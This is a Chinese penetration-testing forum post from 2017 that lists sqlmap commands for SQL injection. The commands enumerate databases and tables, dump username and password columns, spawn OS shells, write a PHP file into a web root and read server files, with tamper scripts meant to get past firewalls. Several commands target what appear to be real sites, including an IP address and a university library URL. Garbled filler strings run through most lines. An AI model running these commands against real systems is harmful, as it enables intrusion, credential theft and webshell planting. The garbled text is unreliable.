中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap+ B7 E+ G3 G* b

4 X+ e# E. X" u1 Zupdate :::::>     in the folder   after  execute    following   order : svn update& u/ L) E  k+ x6 h+ k# A9 m
% y4 ^2 r! F& ?8 H, W
sqlmap.py -r 1.txt --current-db
' o! R& E, }' ], V- W6 y: y9 R5 K0 {( L8 ?5 [
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”) Q/ P+ A8 s0 ^; b

) l9 @; @4 U3 n) p7 C' o3 y7 G==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) . K! Z+ T) Y' ?% I
猜解数据库
- y: N+ r# R& K" q. k# }" |5 A- Y./sqlmap.py -u "injection-url" --dbs5 E6 U" A9 u' Y+ E3 d' t
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% }8 H, X; N- S) h3 }9 \3 T; |" }) [7 I
! q% q% D: s. ~) d4 M猜解表名  K3 T: G- c/ B+ x6 L2 A% i+ ]
./sqlmap.py -u "injection-url" -D database_name --tables
$ h4 M6 T& w8 I  O' H0 t& P
" s0 M& a0 |; {. k& xsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py". P, I4 X1 s# s) \# X4 U( c  O1 U/ ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" ! o! B3 _$ r: O, Z" x  L& S5 [! e, Q- I

( C8 r% _0 K; u" l! ssqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 `( k( x0 \9 p6 x1 K1 `8 p
/ e+ }) ~9 ^7 a. y2 ~sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"% W* z7 s/ j* W& @) K5 f
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
# [; x' v' ^9 h# @. fsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
; L* i' u! l& W/ Y- n1 ssqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
) e4 f  F% H0 Z, W  T+ q+ Y# r! b* S/ [: b% @
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"7 L+ k( h3 u4 I- J9 h& `9 B
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
3 h' o. j9 v4 m- Esqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
( Y# J. q& t. }1 H2 y  asqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
- W  h8 T* c; S/ Wsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
) m) C- z: _/ y! h
. v8 o3 l: X& U# q! X1 K+ Csqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了$ k4 g, ]; ~) S, P# ~' F3 g# h
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"2 m% K& D7 s0 B* A

+ Y  V3 s) C8 \# i$ ?1 E: N7 O$ {( G6 csqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
' P9 K6 E) V) e- O+ ^猜解列名9 W. W, g% ?( n5 ~4 S* L
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
+ ]( p5 l' i! |5 H8 U$ U8 l1 T/ T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
  O& v1 e8 ~" _0 P; }7 h$ f5 ~sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" - {/ u9 i  v. J+ R" ~( Y- ^* w
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
$ ?6 _/ q4 ?6 d1 T/ m' J. ^; \; t
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
. b, U7 p  m  x. |&submit=Go
& {2 Q1 A# d" T" f' C* C1 `& O8 g9 F猜解值6 V' x" p) d9 N1 v; T* Q# Z# w
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump- k4 H7 s( N$ s
========================================================5 e+ Z# r: o2 ?! k
搜索表名中包括mana字符的: q* K3 z: V$ g' Z8 x& W
/sqlmap.py -u "injection-url" -T mana --search2 p/ u; f$ p  J$ b# y4 e4 A
返回一个交互式sql shell
/ ~3 I0 t2 P& O9 E' i4 t7 }/sqlmap.py -u "injection-url" --sql-shell
3 g6 C, e8 r4 \! n1 f5 z读取指定文件(需权限)" G& P$ J; n# J! W8 Z1 y" M
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* i" s, f* m, B# a$ }+ R+ Q查看当前 用户 及 数据库
- w; s! ^( s7 V& d/sqlmap.py -u "injection-url" --current-user --current-db
& r6 t" \2 ]/ g' e) U' r% U本地文件 写入 远程目标绝对路径0 |% N: S; I1 o" V2 {* ~2 l, l
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 F, W! r9 j! p5 z- O, z0 n3 Dsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" ! ]% F/ C7 j2 z: ?

( E# {" c& T1 q6 D3 C; csqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 W! T; X1 a+ x, Q8 r查看某用的权限
) z- ^  @* w) }7 [/sqlmap.py -u "injection-url" --privileges -U root$ r7 K7 p6 k5 M: ~5 V: R" j  z7 H
查看当前用户是否为dba, `% ?4 s1 z9 f/ J
/sqlmap.py -u "injection-url" --is-dba
$ P/ D8 N6 q" m; c) l读取所有数据库用户或指定数据库用户的密码. B7 X8 b# Y" e9 ^
sqlmap.py -r 1.txt --users --passwords$ R+ [) y8 M+ I9 u" O+ a
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 5 [- u7 B# h- I

4 O1 k' Z- a5 d. E# y/sqlmap.py -u "injection-url" --passwords -U root3 E- d: T' S  J  h* P. t

0 Y6 M1 E. |: k7 v--start&&--stop 与 --first&&--last 的区别  R2 B' U* J. l$ r: K) [
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
- ~: c: h% C" {! u! B1 G2 d' i7 R# ]; t) Y
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt): J5 ]5 ^6 o' U  N5 w. ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables' N- e! {$ ^! U; ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns5 h$ B2 A! q, C: H6 J; G
0 W& `0 f. K+ V2 ]& Y
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)- P! r" T5 U! d/ N  H
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
0 q- w1 F/ d& W( B6 g; S7 u" }
" b' U# L7 v" u  p  {; i- q! n




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2